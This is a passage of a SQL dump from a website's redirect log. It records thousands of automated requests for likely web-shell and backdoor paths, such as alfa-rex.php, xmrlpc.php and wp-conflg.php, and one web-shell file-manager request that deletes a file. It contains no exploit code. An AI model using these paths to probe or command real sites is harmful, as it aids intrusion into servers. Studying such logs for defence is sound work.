00:00:00',301),(43897,'http://3s-technologies.com.tr/tr/wp-includescustomizechosen.php',NULL,'','',4,0,'2025-07-31 12:46:04','0000-00-00 00:00:00',301),(43898,'http://3s-technologies.com.tr/tr/wp-includesixrindex.php',NULL,'','',4,0,'2025-07-31 12:46:15','0000-00-00 00:00:00',301),(43899,'http://3s-technologies.com.tr/tr/wp-contentpluginsxt',NULL,'','',8,0,'2025-07-31 12:46:16','0000-00-00 00:00:00',301),(43900,'http://3s-technologies.com.tr/tr/wp-includesautoload_classmap.php',NULL,'','',4,0,'2025-07-31 12:46:17','0000-00-00 00:00:00',301),(43901,'http://3s-technologies.com.tr/tr/wp-adminjsautoload_classmap.php',NULL,'','',4,0,'2025-07-31 12:46:18','0000-00-00 00:00:00',301),(43902,'http://3s-technologies.com.tr/tr/wp-includestextautoload_classmap.php',NULL,'','',4,0,'2025-07-31 12:46:19','0000-00-00 00:00:00',301),(43903,'http://3s-technologies.com.tr/tr/wp-admincsscolorsblueadmin.php',NULL,'','',4,0,'2025-07-31 12:46:27','0000-00-00 00:00:00',301),(43904,'http://3s-technologies.com.tr/tr/imagesindex.php',NULL,'','',4,0,'2025-07-31 12:46:33','0000-00-00 00:00:00',301),(43905,'http://3s-technologies.com.tr/tr/wp-contentuploadsindex.php',NULL,'','',4,0,'2025-07-31 12:46:34','0000-00-00 00:00:00',301),(43906,'http://3s-technologies.com.tr/tr/indexfunction.php',NULL,'','',4,0,'2025-07-31 12:46:35','0000-00-00 00:00:00',301),(43907,'http://3s-technologies.com.tr/tr/wp-adminuserindex.php',NULL,'','',4,0,'2025-07-31 12:46:36','0000-00-00 00:00:00',301),(43908,'http://3s-technologies.com.tr/tr/wp-adminjsindex.php',NULL,'','',4,0,'2025-07-31 12:46:38','0000-00-00 00:00:00',301),(43909,'http://3s-technologies.com.tr/tr/.well-knownadmin.php',NULL,'','',4,0,'2025-07-31 12:46:41','0000-00-00 00:00:00',301),(43910,'http://3s-technologies.com.tr/tr/wp-includesjstinymcepluginscompat3xcss',NULL,'','',4,0,'2025-07-31 12:46:42','0000-00-00 00:00:00',301),(43911,'http://3s-technologies.com.tr/tr/.well-knownfile.php',NULL,'','',8,0,'2025-07-31 12:46:46','0000-00-00 00:00:00',301),(43912,'http://3s-technologies.com.tr/tr/.well-knownpki-validationindex.php',NULL,'','',4,0,'2025-07-31 12:46:46','0000-00-00 00:00:00',301),(43913,'http://3s-technologies.com.tr/tr/.well-knownacme-challengeabout.php',NULL,'','',4,0,'2025-07-31 12:46:47','0000-00-00 00:00:00',301),(43914,'http://3s-technologies.com.tr/tr/wp-contentfile.php',NULL,'','',4,0,'2025-07-31 12:46:48','0000-00-00 00:00:00',301),(43915,'http://3s-technologies.com.tr/tr/wp-includescssindex.php',NULL,'','',4,0,'2025-07-31 12:46:50','0000-00-00 00:00:00',301),(43916,'http://3s-technologies.com.tr/tr/publicmakeasmtp.php',NULL,'','',4,0,'2025-07-31 12:46:52','0000-00-00 00:00:00',301),(43917,'http://3s-technologies.com.tr/tr/wp-includescustomizeindex.php',NULL,'','',4,0,'2025-07-31 12:46:53','0000-00-00 00:00:00',301),(43918,'http://3s-technologies.com.tr/tr/wp-includesid3index.php',NULL,'','',4,0,'2025-07-31 12:46:56','0000-00-00 00:00:00',301),(43919,'http://3s-technologies.com.tr/tr/wp-admincsscolorsblue',NULL,'','',4,0,'2025-07-31 12:46:57','0000-00-00 00:00:00',301),(43920,'http://3s-technologies.com.tr/tr/wp-adminmaintabout.php',NULL,'','',4,0,'2025-07-31 12:47:01','0000-00-00 00:00:00',301),(43921,'http://3s-technologies.com.tr/tr/wp-contentuploads202210upload.php',NULL,'','',4,0,'2025-07-31 12:47:01','0000-00-00 00:00:00',301),(43922,'http://3s-technologies.com.tr/tr/wp-adminoptions.php',NULL,'','',4,0,'2025-07-31 12:47:04','0000-00-00 00:00:00',301),(43923,'http://3s-technologies.com.tr/tr/wp-contentxindex.php',NULL,'','',4,0,'2025-07-31 12:47:05','0000-00-00 00:00:00',301),(43924,'http://3s-technologies.com.tr/tr/.well-knownwp-login.php',NULL,'','',4,0,'2025-07-31 12:47:06','0000-00-00 00:00:00',301),(43925,'http://3s-technologies.com.tr/tr/wp-contentpluginslinkpreviewindex.php',NULL,'','',4,0,'2025-07-31 12:47:07','0000-00-00 00:00:00',301),(43926,'http://3s-technologies.com.tr/tr/wp-contentcacheindex.php',NULL,'','',4,0,'2025-07-31 12:47:08','0000-00-00 00:00:00',301),(43927,'http://3s-technologies.com.tr/tr/wp-adminfile.php',NULL,'','',4,0,'2025-07-31 12:47:09','0000-00-00 00:00:00',301),(43928,'http://3s-technologies.com.tr/tr/wp-contentuploads202503themes.php',NULL,'','',4,0,'2025-07-31 12:47:11','0000-00-00 00:00:00',301),(43929,'http://3s-technologies.com.tr/tr/wp-includesjsjcropjcrop.php',NULL,'','',4,0,'2025-07-31 12:47:16','0000-00-00 00:00:00',301),(43930,'http://3s-technologies.com.tr/tr/wp-adminmaintadmin.php',NULL,'','',4,0,'2025-07-31 12:47:17','0000-00-00 00:00:00',301),(43931,'http://3s-technologies.com.tr/tr/wp-adminincludesabout.php',NULL,'','',4,0,'2025-07-31 12:47:18','0000-00-00 00:00:00',301),(43932,'http://3s-technologies.com.tr/tr/wp-adminmaint',NULL,'','',4,0,'2025-07-31 12:47:19','0000-00-00 00:00:00',301),(43933,'http://3s-technologies.com.tr/tr/wp-includessimplepieadmin.php',NULL,'','',4,0,'2025-07-31 12:47:20','0000-00-00 00:00:00',301),(43934,'http://3s-technologies.com.tr/tr/wp-admincsscolorsmidnightcolors.php',NULL,'','',4,0,'2025-07-31 12:47:20','0000-00-00 00:00:00',301),(43935,'http://3s-technologies.com.tr/tr/wp-contentupgradeindex.php',NULL,'','',4,0,'2025-07-31 12:47:21','0000-00-00 00:00:00',301),(43936,'http://3s-technologies.com.tr/tr/wp-adminpages.php',NULL,'','',4,0,'2025-07-31 12:47:22','0000-00-00 00:00:00',301),(43937,'http://3s-technologies.com.tr/tr/wp-contentadmin.php',NULL,'','',4,0,'2025-07-31 12:47:23','0000-00-00 00:00:00',301),(43938,'http://3s-technologies.com.tr/tr/asfunction.php',NULL,'','',4,0,'2025-07-31 12:47:24','0000-00-00 00:00:00',301),(43939,'http://3s-technologies.com.tr/tr/wp-adminsetup-config.php',NULL,'','',4,0,'2025-07-31 12:47:24','0000-00-00 00:00:00',301),(43940,'http://3s-technologies.com.tr/tr/wp-contentlanguageswp-login.php',NULL,'','',4,0,'2025-07-31 12:47:25','0000-00-00 00:00:00',301),(43941,'http://3s-technologies.com.tr/tr/wp-contentautoload_classmap.php',NULL,'','',4,0,'2025-07-31 12:47:25','0000-00-00 00:00:00',301),(43942,'http://3s-technologies.com.tr/tr/wp-admincsscolorsindex.php',NULL,'','',4,0,'2025-07-31 12:47:26','0000-00-00 00:00:00',301),(43943,'http://3s-technologies.com.tr/tr/wp-contentlanguagesindex.php',NULL,'','',4,0,'2025-07-31 12:47:26','0000-00-00 00:00:00',301),(43944,'http://3s-technologies.com.tr/tr/wp-contentpluginswordpresscoreinclude.php',NULL,'','',4,0,'2025-07-31 12:47:27','0000-00-00 00:00:00',301),(43945,'http://3s-technologies.com.tr/tr/wp-contentthemesseothememar.php',NULL,'','',4,0,'2025-07-31 12:47:28','0000-00-00 00:00:00',301),(43946,'http://3s-technologies.com.tr/tr/wp-includesalfa_dataalfacgiapiperl.alfa',NULL,'','',4,0,'2025-07-31 12:47:28','0000-00-00 00:00:00',301),(43947,'http://3s-technologies.com.tr/tr/wp-contentpluginsrevsliderincludesexternalpageindex.php',NULL,'','',4,0,'2025-07-31 12:47:29','0000-00-00 00:00:00',301),(43948,'http://3s-technologies.com.tr/tr/.well-knownacme-challengeindex.php',NULL,'','',4,0,'2025-07-31 12:47:29','0000-00-00 00:00:00',301),(43949,'http://3s-technologies.com.tr/tr/wp-contentdropdown.php',NULL,'','',4,0,'2025-07-31 12:47:32','0000-00-00 00:00:00',301),(43950,'http://3s-technologies.com.tr/tr/wp-contentuploads',NULL,'','',4,0,'2025-07-31 12:47:33','0000-00-00 00:00:00',301),(43951,'http://3s-technologies.com.tr/tr/wp-admincsscolorsblueindex.php',NULL,'','',8,0,'2025-07-31 12:47:33','0000-00-00 00:00:00',301),(43952,'http://3s-technologies.com.tr/tr/wp-adminimagesadmin.php',NULL,'','',4,0,'2025-07-31 12:47:35','0000-00-00 00:00:00',301),(43953,'http://3s-technologies.com.tr/tr/sim.phpwp-includescertificatesplugins.php',NULL,'','',4,0,'2025-07-31 12:47:37','0000-00-00 00:00:00',301),(43954,'http://3s-technologies.com.tr/tr/wp-includesassetsindex.php',NULL,'','',4,0,'2025-07-31 12:47:39','0000-00-00 00:00:00',301),(43955,'http://3s-technologies.com.tr/tr/wp-includesixrallez.php',NULL,'','',4,0,'2025-07-31 12:47:41','0000-00-00 00:00:00',301),(43956,'http://3s-technologies.com.tr/tr/searchlabelphp-shells',NULL,'','',4,0,'2025-07-31 12:47:47','0000-00-00 00:00:00',301),(43957,'http://3s-technologies.com.tr/tr/cgi-binxmrlpc.php',NULL,'','',4,0,'2025-07-31 12:47:49','0000-00-00 00:00:00',301),(43958,'http://3s-technologies.com.tr/tr/wp-includespomofgertreyersd.php',NULL,'','',4,0,'2025-07-31 12:47:53','0000-00-00 00:00:00',301),(43959,'http://3s-technologies.com.tr/tr/cssxmrlpc.php',NULL,'','',4,0,'2025-07-31 12:47:53','0000-00-00 00:00:00',301),(43960,'http://3s-technologies.com.tr/tr/themeszmousseotuz1.php',NULL,'','',4,0,'2025-07-31 12:47:54','0000-00-00 00:00:00',301),(43961,'http://3s-technologies.com.tr/tr/wp-admincssindex.php',NULL,'','',4,0,'2025-07-31 12:47:56','0000-00-00 00:00:00',301),(43962,'http://3s-technologies.com.tr/tr/wp-adminmaintindex.php',NULL,'','',4,0,'2025-07-31 12:47:56','0000-00-00 00:00:00',301),(43963,'http://3s-technologies.com.tr/tr/wp-adminuserxmrlpc.php',NULL,'','',4,0,'2025-07-31 12:47:56','0000-00-00 00:00:00',301),(43964,'http://3s-technologies.com.tr/tr/sitewp-admin',NULL,'','',4,0,'2025-07-31 12:47:57','0000-00-00 00:00:00',301),(43965,'http://3s-technologies.com.tr/tr/wp-contentpluginsindex.php',NULL,'','',4,0,'2025-07-31 12:47:58','0000-00-00 00:00:00',301),(43966,'http://3s-technologies.com.tr/tr/adminfunction.php',NULL,'','',4,0,'2025-07-31 12:47:59','0000-00-00 00:00:00',301),(43967,'http://3s-technologies.com.tr/tr/wp-includesrequestschosen.php',NULL,'','',4,0,'2025-07-31 12:48:00','0000-00-00 00:00:00',301),(43968,'http://3s-technologies.com.tr/tr/wp-contentthemesabout.php',NULL,'','',4,0,'2025-07-31 12:48:00','0000-00-00 00:00:00',301),(43969,'http://3s-technologies.com.tr/tr/wp-includespomoabout.php',NULL,'','',4,0,'2025-07-31 12:48:01','0000-00-00 00:00:00',301),(43970,'http://3s-technologies.com.tr/tr/wp-contentuploads2024index.php',NULL,'','',4,0,'2025-07-31 12:48:01','0000-00-00 00:00:00',301),(43971,'http://3s-technologies.com.tr/tr/.well-knowncong.php',NULL,'','',4,0,'2025-07-31 12:48:02','0000-00-00 00:00:00',301),(43972,'http://3s-technologies.com.tr/tr/wp-includessimplepieindex.php',NULL,'','',4,0,'2025-07-31 12:48:02','0000-00-00 00:00:00',301),(43973,'http://3s-technologies.com.tr/tr/wp-contentlanguagesabout.php',NULL,'','',4,0,'2025-07-31 12:48:03','0000-00-00 00:00:00',301),(43974,'http://3s-technologies.com.tr/tr/wp-adminnetworkindex.php',NULL,'','',4,0,'2025-07-31 12:48:04','0000-00-00 00:00:00',301),(43975,'http://3s-technologies.com.tr/tr/aboutfunction.php',NULL,'','',4,0,'2025-07-31 12:48:05','0000-00-00 00:00:00',301),(43976,'http://3s-technologies.com.tr/tr/simplefunction.php',NULL,'','',4,0,'2025-07-31 12:48:05','0000-00-00 00:00:00',301),(43977,'http://3s-technologies.com.tr/tr/mahfunction.php',NULL,'','',4,0,'2025-07-31 12:48:06','0000-00-00 00:00:00',301),(43978,'http://3s-technologies.com.tr/tr/cgi-binindex.php',NULL,'','',4,0,'2025-07-31 12:48:07','0000-00-00 00:00:00',301),(43979,'http://3s-technologies.com.tr/tr/wp-includesbuy.php',NULL,'','',4,0,'2025-07-31 12:48:07','0000-00-00 00:00:00',301),(43980,'http://3s-technologies.com.tr/tr/wp-contentthemesastraincki1k.php',NULL,'','',4,0,'2025-07-31 12:48:08','0000-00-00 00:00:00',301),(43981,'http://3s-technologies.com.tr/tr/homefunction.php',NULL,'','',4,0,'2025-07-31 12:48:09','0000-00-00 00:00:00',301),(43982,'http://3s-technologies.com.tr/tr/wp-contentindex.php',NULL,'','',4,0,'2025-07-31 12:48:10','0000-00-00 00:00:00',301),(43983,'http://3s-technologies.com.tr/tr/wp-contentupgradeabout.php',NULL,'','',4,0,'2025-07-31 12:48:10','0000-00-00 00:00:00',301),(43984,'http://3s-technologies.com.tr/tr/wp-includesrequestslibraryabout.php',NULL,'','',4,0,'2025-07-31 12:48:11','0000-00-00 00:00:00',301),(43985,'http://3s-technologies.com.tr/tr/cssindex.php',NULL,'','',4,0,'2025-07-31 12:48:12','0000-00-00 00:00:00',301),(43986,'http://3s-technologies.com.tr/tr/.well-knownindex.php',NULL,'','',4,0,'2025-07-31 12:48:12','0000-00-00 00:00:00',301),(43987,'http://3s-technologies.com.tr/tr/wp-adminuserwp-login.php',NULL,'','',4,0,'2025-07-31 12:48:14','0000-00-00 00:00:00',301),(43988,'http://3s-technologies.com.tr/tr/wp-contentradio.php',NULL,'','',4,0,'2025-07-31 12:48:15','0000-00-00 00:00:00',301),(43989,'http://3s-technologies.com.tr/tr/wp-contentpluginsabout.php',NULL,'','',4,0,'2025-07-31 12:48:15','0000-00-00 00:00:00',301),(43990,'http://3s-technologies.com.tr/tr/wp-contentabout.php',NULL,'','',4,0,'2025-07-31 12:48:16','0000-00-00 00:00:00',301),(43991,'http://3s-technologies.com.tr/tr/wp-adminadmin.php',NULL,'','',4,0,'2025-07-31 12:48:17','0000-00-00 00:00:00',301),(43992,'http://3s-technologies.com.tr/tr/wp-admincssadmin.php',NULL,'','',4,0,'2025-07-31 12:48:17','0000-00-00 00:00:00',301),(43993,'http://3s-technologies.com.tr/tr/templatesbeez3index.php',NULL,'','',4,0,'2025-07-31 12:48:18','0000-00-00 00:00:00',301),(43994,'http://3s-technologies.com.tr/tr/wp-contentpluginssimplesimple.php',NULL,'','',4,0,'2025-07-31 12:48:18','0000-00-00 00:00:00',301),(43995,'http://3s-technologies.com.tr/tr/wp-contentpluginspwnd1.php',NULL,'','',4,0,'2025-07-31 12:48:20','0000-00-00 00:00:00',301),(43996,'http://3s-technologies.com.tr/tr/adminuploadcss.php',NULL,'','',4,0,'2025-07-31 12:48:20','0000-00-00 00:00:00',301),(43997,'http://3s-technologies.com.tr/tr/wp-adminimagesabout.php',NULL,'','',4,0,'2025-07-31 12:48:21','0000-00-00 00:00:00',301),(43998,'http://3s-technologies.com.tr/tr/wp-includesautoloadclassmap.php',NULL,'','',4,0,'2025-07-31 12:48:21','0000-00-00 00:00:00',301),(43999,'http://3s-technologies.com.tr/tr/.well-knowncaches.php',NULL,'','',4,0,'2025-07-31 12:48:23','0000-00-00 00:00:00',301),(44000,'http://3s-technologies.com.tr/tr/wp-adminclasswithtostring.php',NULL,'','',4,0,'2025-07-31 12:48:24','0000-00-00 00:00:00',301),(44001,'http://3s-technologies.com.tr/tr/wp-includescssabout.php',NULL,'','',4,0,'2025-07-31 12:48:24','0000-00-00 00:00:00',301),(44002,'http://3s-technologies.com.tr/tr/filesindex.php',NULL,'','',4,0,'2025-07-31 12:48:25','0000-00-00 00:00:00',301),(44003,'http://3s-technologies.com.tr/tr/.well-knownpki-validationxmrlpc.php',NULL,'','',4,0,'2025-07-31 12:48:25','0000-00-00 00:00:00',301),(44004,'http://3s-technologies.com.tr/tr/wp-adminnetworkadmin.php',NULL,'','',4,0,'2025-07-31 12:48:26','0000-00-00 00:00:00',301),(44005,'http://3s-technologies.com.tr/tr/wp-includesrequestsabout.php',NULL,'','',4,0,'2025-07-31 12:48:26','0000-00-00 00:00:00',301),(44006,'http://3s-technologies.com.tr/tr/wp-includeswidgetsabout.php',NULL,'','',4,0,'2025-07-31 12:48:27','0000-00-00 00:00:00',301),(44007,'http://3s-technologies.com.tr/tr/wp-admincsscolorscoffeeindex.php',NULL,'','',4,0,'2025-07-31 12:48:27','0000-00-00 00:00:00',301),(44008,'http://3s-technologies.com.tr/tr/wp-includesfontswp-login.php',NULL,'','',4,0,'2025-07-31 12:48:28','0000-00-00 00:00:00',301),(44009,'http://3s-technologies.com.tr/tr/wp-adminautoload_classmap.php',NULL,'','',4,0,'2025-07-31 12:48:29','0000-00-00 00:00:00',301),(44010,'http://3s-technologies.com.tr/tr/wp-includesfontsindex.php',NULL,'','',4,0,'2025-07-31 12:48:30','0000-00-00 00:00:00',301),(44011,'http://3s-technologies.com.tr/tr/wp-includestheme-compatabout.php',NULL,'','',4,0,'2025-07-31 12:48:31','0000-00-00 00:00:00',301),(44012,'http://3s-technologies.com.tr/tr/cgi-binwp-login.php',NULL,'','',4,0,'2025-07-31 12:48:31','0000-00-00 00:00:00',301),(44013,'http://3s-technologies.com.tr/tr/wp-contentthemestwentytwenty.php',NULL,'','',4,0,'2025-07-31 12:48:32','0000-00-00 00:00:00',301),(44014,'http://3s-technologies.com.tr/tr/wp-adminimagescloud.php',NULL,'','',4,0,'2025-07-31 12:48:33','0000-00-00 00:00:00',301),(44015,'http://3s-technologies.com.tr/tr/wp-admincssabout.php',NULL,'','',4,0,'2025-07-31 12:48:33','0000-00-00 00:00:00',301),(44016,'http://3s-technologies.com.tr/tr/wp-includescustomizeabout.php',NULL,'','',4,0,'2025-07-31 12:48:34','0000-00-00 00:00:00',301),(44017,'http://3s-technologies.com.tr/tr/wp-includesimagessmiliesabout.php',NULL,'','',4,0,'2025-07-31 12:48:34','0000-00-00 00:00:00',301),(44018,'http://3s-technologies.com.tr/tr/wp-includessimplepieabout.php',NULL,'','',4,0,'2025-07-31 12:48:35','0000-00-00 00:00:00',301),(44019,'http://3s-technologies.com.tr/tr/wp-includestextindex.php',NULL,'','',4,0,'2025-07-31 12:48:36','0000-00-00 00:00:00',301),(44020,'http://3s-technologies.com.tr/tr/wp-contentupgrade-temp-backupabout.php',NULL,'','',4,0,'2025-07-31 12:48:36','0000-00-00 00:00:00',301),(44021,'http://3s-technologies.com.tr/tr/.well-knownpki-validationabout.php',NULL,'','',4,0,'2025-07-31 12:48:37','0000-00-00 00:00:00',301),(44022,'http://3s-technologies.com.tr/tr/wp-includesblock-patternsabout.php',NULL,'','',4,0,'2025-07-31 12:48:37','0000-00-00 00:00:00',301),(44023,'http://3s-technologies.com.tr/tr/wp-includesjstinymcepluginscompat3xcssindex.php',NULL,'','',4,0,'2025-07-31 12:48:38','0000-00-00 00:00:00',301),(44024,'http://3s-technologies.com.tr/tr/wp-includesrest-apiabout.php',NULL,'','',4,0,'2025-07-31 12:48:38','0000-00-00 00:00:00',301),(44025,'http://3s-technologies.com.tr/tr/wp-includesimageswp-login.php',NULL,'','',4,0,'2025-07-31 12:48:40','0000-00-00 00:00:00',301),(44026,'http://3s-technologies.com.tr/tr/wp-contentthemespridmagdb.php',NULL,'','',4,0,'2025-07-31 12:48:41','0000-00-00 00:00:00',301),(44027,'http://3s-technologies.com.tr/tr/wp-includessodium_compatsrccore32curve25519geindex.php',NULL,'','',4,0,'2025-07-31 12:48:42','0000-00-00 00:00:00',301),(44028,'http://3s-technologies.com.tr/tr/wp-adminimagesindex.php',NULL,'','',4,0,'2025-07-31 12:48:43','0000-00-00 00:00:00',301),(44029,'http://3s-technologies.com.tr/tr/wp-contentuploadscong.php',NULL,'','',4,0,'2025-07-31 12:48:44','0000-00-00 00:00:00',301),(44030,'http://3s-technologies.com.tr/tr/wp-contentpluginsadmin.php',NULL,'','',4,0,'2025-07-31 12:48:44','0000-00-00 00:00:00',301),(44031,'http://3s-technologies.com.tr/tr/wp-adminindex.php',NULL,'','',4,0,'2025-07-31 12:48:45','0000-00-00 00:00:00',301),(44032,'http://3s-technologies.com.tr/tr/wp-includesimagesabout.php',NULL,'','',4,0,'2025-07-31 12:48:46','0000-00-00 00:00:00',301),(44033,'http://3s-technologies.com.tr/tr/wp-admincsscolorscoffeeabout.php',NULL,'','',4,0,'2025-07-31 12:48:47','0000-00-00 00:00:00',301),(44034,'http://3s-technologies.com.tr/tr/wp-contentthemesaleraalpha.php',NULL,'','',4,0,'2025-07-31 12:48:48','0000-00-00 00:00:00',301),(44035,'http://3s-technologies.com.tr/tr/wp-adminusers.php',NULL,'','',4,0,'2025-07-31 12:48:48','0000-00-00 00:00:00',301),(44036,'http://3s-technologies.com.tr/tr/wp-includesblocksabout.php',NULL,'','',4,0,'2025-07-31 12:48:49','0000-00-00 00:00:00',301),(44037,'http://3s-technologies.com.tr/tr/wp-includestextabout.php',NULL,'','',4,0,'2025-07-31 12:48:50','0000-00-00 00:00:00',301),(44038,'http://3s-technologies.com.tr/tr/wp-contentthemeswp-pridmaginit.php',NULL,'','',4,0,'2025-07-31 12:48:50','0000-00-00 00:00:00',301),(44039,'http://3s-technologies.com.tr/tr/wp-contentthemesindex.php',NULL,'','',4,0,'2025-07-31 12:48:51','0000-00-00 00:00:00',301),(44040,'http://3s-technologies.com.tr/tr/wp-includesplugins.php',NULL,'','',4,0,'2025-07-31 12:48:51','0000-00-00 00:00:00',301),(44041,'http://3s-technologies.com.tr/tr/wp-contentupgradewp-login.php',NULL,'','',4,0,'2025-07-31 12:48:52','0000-00-00 00:00:00',301),(44042,'http://3s-technologies.com.tr/tr/wp-includescertificateswp-login.php',NULL,'','',4,0,'2025-07-31 12:48:52','0000-00-00 00:00:00',301),(44043,'http://3s-technologies.com.tr/tr/wp-admincssnetwork.php',NULL,'','',4,0,'2025-07-31 12:48:53','0000-00-00 00:00:00',301),(44044,'http://3s-technologies.com.tr/tr/assetsbypass.php',NULL,'','',4,0,'2025-07-31 12:48:54','0000-00-00 00:00:00',301),(44045,'http://3s-technologies.com.tr/tr/wp-adminjs',NULL,'','',4,0,'2025-07-31 12:48:56','0000-00-00 00:00:00',301),(44046,'http://3s-technologies.com.tr/tr/wp-adminimageschosen.php',NULL,'','',4,0,'2025-07-31 12:48:56','0000-00-00 00:00:00',301),(44047,'http://3s-technologies.com.tr/tr/wp-includeswp-class.php',NULL,'','',4,0,'2025-07-31 12:48:57','0000-00-00 00:00:00',301),(44048,'http://3s-technologies.com.tr/tr/wp-admininstall.php',NULL,'','',4,0,'2025-07-31 12:48:57','0000-00-00 00:00:00',301),(44049,'http://3s-technologies.com.tr/tr/wp-includesjstinymceskinslightgrayimgindex.php',NULL,'','',4,0,'2025-07-31 12:48:58','0000-00-00 00:00:00',301),(44050,'http://3s-technologies.com.tr/tr/cgi-binabout.php',NULL,'','',4,0,'2025-07-31 12:48:58','0000-00-00 00:00:00',301),(44051,'http://3s-technologies.com.tr/tr/wp-admincsscolorsabout.php',NULL,'','',4,0,'2025-07-31 12:48:59','0000-00-00 00:00:00',301),(44052,'http://3s-technologies.com.tr/tr/wp-adminjsabout.php',NULL,'','',4,0,'2025-07-31 12:48:59','0000-00-00 00:00:00',301),(44053,'http://3s-technologies.com.tr/tr/imagesclass-config.php',NULL,'','',4,0,'2025-07-31 12:49:00','0000-00-00 00:00:00',301),(44054,'http://3s-technologies.com.tr/tr/wp-includeswidgetsinclude.php',NULL,'','',4,0,'2025-07-31 12:49:01','0000-00-00 00:00:00',301),(44055,'http://3s-technologies.com.tr/tr/.well-knownacme-challengeadmin.php',NULL,'','',4,0,'2025-07-31 12:49:02','0000-00-00 00:00:00',301),(44056,'http://3s-technologies.com.tr/tr/wp-includeswp-includes_function.php',NULL,'','',4,0,'2025-07-31 12:49:02','0000-00-00 00:00:00',301),(44057,'http://3s-technologies.com.tr/tr/wp-includessimplepiegzdecodes.php',NULL,'','',4,0,'2025-07-31 12:49:03','0000-00-00 00:00:00',301),(44058,'http://3s-technologies.com.tr/tr/wp-admincsscolorsblueabout.php',NULL,'','',4,0,'2025-07-31 12:49:04','0000-00-00 00:00:00',301),(44059,'http://3s-technologies.com.tr/tr/themesindex.php',NULL,'','',4,0,'2025-07-31 12:49:05','0000-00-00 00:00:00',301),(44060,'http://3s-technologies.com.tr/tr/cc.php /admin.php?fm=true&delete=license.txt&path=/www/wwwroot/www.globalcasinolist.net/',NULL,'','',1,0,'2025-07-31 13:51:42','0000-00-00 00:00:00',301),(44061,'http://3s-technologies.com.tr/tr/1.php?option&path=/www/wwwroot/www.mkgseattlestore.com',NULL,'','',1,0,'2025-07-31 13:52:26','0000-00-00 00:00:00',301),(44062,'http://3s-technologies.com.tr/tr/vendor/phpunit/phpunit/src/util/php/ffl82xdf59.php',NULL,'','',1,0,'2025-08-01 01:03:22','0000-00-00 00:00:00',301),(44063,'http://3s-technologies.com.tr/tr/wp-admin/axcjwclf.php',NULL,'','',1,0,'2025-08-01 01:03:28','0000-00-00 00:00:00',301),(44064,'http://3s-technologies.com.tr/tr/wp-admin/css/colors/blue/blkabtfa.php',NULL,'','',1,0,'2025-08-01 01:03:34','0000-00-00 00:00:00',301),(44065,'http://3s-technologies.com.tr/tr/bu5.php',NULL,'','',2,0,'2025-08-01 01:34:00','0000-00-00 00:00:00',301),(44066,'http://3s-technologies.com.tr/tr/filename.php',NULL,'','',13,0,'2025-08-01 02:11:13','0000-00-00 00:00:00',301),(44067,'http://3s-technologies.com.tr/tr/123456789.php',NULL,'','',1,0,'2025-08-01 02:11:15','0000-00-00 00:00:00',301),(44068,'http://3s-technologies.com.tr/tr/1527011137.php',NULL,'','',1,0,'2025-08-01 02:11:16','0000-00-00 00:00:00',301),(44069,'http://3s-technologies.com.tr/tr/well-known/admin.php',NULL,'','',2,0,'2025-08-01 08:59:26','0000-00-00 00:00:00',301),(44070,'http://3s-technologies.com.tr/tr/t.php7',NULL,'','',11,0,'2025-08-01 22:06:42','0000-00-00 00:00:00',301),(44071,'http://3s-technologies.com.tr/tr/alfa-rex.php8',NULL,'','',3,0,'2025-08-01 22:06:54','0000-00-00 00:00:00',301),(44072,'http://3s-technologies.com.tr/tr/alfa-rex.php56',NULL,'','',5,0,'2025-08-01 22:06:56','0000-00-00 00:00:00',301),(44073,'http://3s-technologies.com.tr/tr/ip.php',NULL,'','',4,0,'2025-08-02 02:14:57','0000-00-00 00:00:00',301),(44074,'http://3s-technologies.com.tr/tr/admin1.php',NULL,'','',28,0,'2025-08-02 02:14:59','0000-00-00 00:00:00',301),(44075,'http://3s-technologies.com.tr/tr/wp-admin/images/wp-conflg.php?p=',NULL,'','',4,0,'2025-08-02 02:15:00','0000-00-00 00:00:00',301),(44076,'http://3s-technologies.com.tr/tr/uploads/form3.php',NULL,'','',10,0,'2025-08-02 02:15:03','0000-00-00 00:00:00',301),(44077,'http://3s-technologies.com.tr/tr/uploads/multi.php',NULL,'','',11,0,'2025-08-02 02:15:05','0000-00-00 00:00:00',301),(44078,'http://3s-technologies.com.tr/tr/ay.php',NULL,'','',31,0,'2025-08-02 02:15:07','0000-00-00 00:00:00',301),(44079,'http://3s-technologies.com.tr/tr/update/nf.php',NULL,'','',12,0,'2025-08-02 02:15:08','0000-00-00 00:00:00',301),(44080,'http://3s-technologies.com.tr/tr/themes/twentytwentythree/styles/about.php',NULL,'','',2,0,'2025-08-03 06:49:48','0000-00-00 00:00:00',301),(44081,'http://3s-technologies.com.tr/tr/.well-known/gecko-litespeed.html',NULL,'','',2,0,'2025-08-03 06:50:54','0000-00-00 00:00:00',301),(44082,'http://3s-technologies.com.tr/tr/wp-content/uploads/2025/admin.php',NULL,'','',2,0,'2025-08-03 06:50:55','0000-00-00 00:00:00',301),(44083,'http://3s-technologies.com.tr/tr/image-gallery.php',NULL,'','',3,0,'2025-08-03 08:22:51','0000-00-00 00:00:00',301),(44084,'http://3s-technologies.com.tr/tr/containerawaretrait.php',NULL,'','',3,0,'2025-08-03 08:22:52','0000-00-00 00:00:00',301),(44085,'http://3s-technologies.com.tr/tr/dashboard',NULL,'','',2,0,'2025-08-03 20:05:37','0000-00-00 00:00:00',301),(44086,'http://3s-technologies.com.tr/tr/akcc.php',NULL,'','',111,0,'2025-08-03 20:53:28','0000-00-00 00:00:00',301),(44087,'http://3s-technologies.com.tr/tr/ms-load.php',NULL,'','',1,0,'2025-08-03 20:53:29','0000-00-00 00:00:00',301),(44088,'http://3s-technologies.com.tr/tr/wp-admin/includes/network.php',NULL,'','',1,0,'2025-08-04 02:57:50','0000-00-00 00:00:00',301),(44089,'http://3s-technologies.com.tr/tr/wp-mail.php/wp-includes/id3/webadmin.php',NULL,'','',1,0,'2025-08-04 02:57:51','0000-00-00 00:00:00',301),(44090,'http://3s-technologies.com.tr/tr/wp-includes/simplepie/media.php.infected.php',NULL,'','',1,0,'2025-08-04 02:57:51','0000-00-00 00:00:00',301),(44091,'http://3s-technologies.com.tr/tr/wp-includes/images/wlw/log.php',NULL,'','',1,0,'2025-08-04 02:57:53','0000-00-00 00:00:00',301),(44092,'http://3s-technologies.com.tr/tr/wp-admin/includes/fm.php',NULL,'','',1,0,'2025-08-04 02:57:54','0000-00-00 00:00:00',301),(44093,'http://3s-technologies.com.tr/tr/wp-includes/images/smilies/baxa1.php8',NULL,'','',1,0,'2025-08-04 02:57:56','0000-00-00 00:00:00',301),(44094,'http://3s-technologies.com.tr/tr/wp-includes/assets/go.php',NULL,'','',1,0,'2025-08-04 02:57:57','0000-00-00 